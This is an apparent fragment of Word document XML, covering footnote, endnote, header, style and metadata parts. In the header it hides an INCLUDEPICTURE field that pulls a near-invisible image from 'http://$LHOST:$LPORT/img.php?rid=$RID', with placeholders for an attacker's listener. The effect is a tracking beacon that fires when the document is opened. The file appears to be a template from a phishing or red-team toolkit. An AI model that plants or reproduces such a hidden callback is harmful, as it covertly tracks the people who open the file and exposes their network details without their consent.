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C89" w:rsidRDefault="005A3617">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00084C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FC" w:rsidRDefault="001D2BFC" w:rsidP="001D2BFC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="001D2BFC" w:rsidRDefault="001D2BFC" w:rsidP="001D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FC" w:rsidRDefault="001D2BFC" w:rsidP="001D2BFC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="001D2BFC" w:rsidRDefault="001D2BFC" w:rsidP="001D2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BFC" w:rsidRDefault="005A3617">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve"> </w:instrText>
    </w:r>
    <w:r>
      <w:instrText>INCLUDEPICTURE  \d "http://$LHOST:$LPORT/img.php?rid=$RID&amp;type=img" \* MERGEFORMATINET</w:instrText>
    </w:r>
    <w:r>
      <w:instrText xml:space="preserve">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.45pt;height:3.45pt">
          <v:imagedata r:id="rId1"/>
        </v:shape>
      </w:pic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FC"/>
    <w:rsid w:val="001D2BFC"/>
    <w:rsid w:val="00575D31"/>
    <w:rsid w:val="005A3617"/>
    <w:rsid w:val="007A7957"/>
    <w:rsid w:val="00971114"/>
    <w:rsid w:val="00B5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FC"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001D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$LHOST:$LPORT/img.php?rid=$RID&amp;type=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2018-11-02T01:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-11-02T01:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>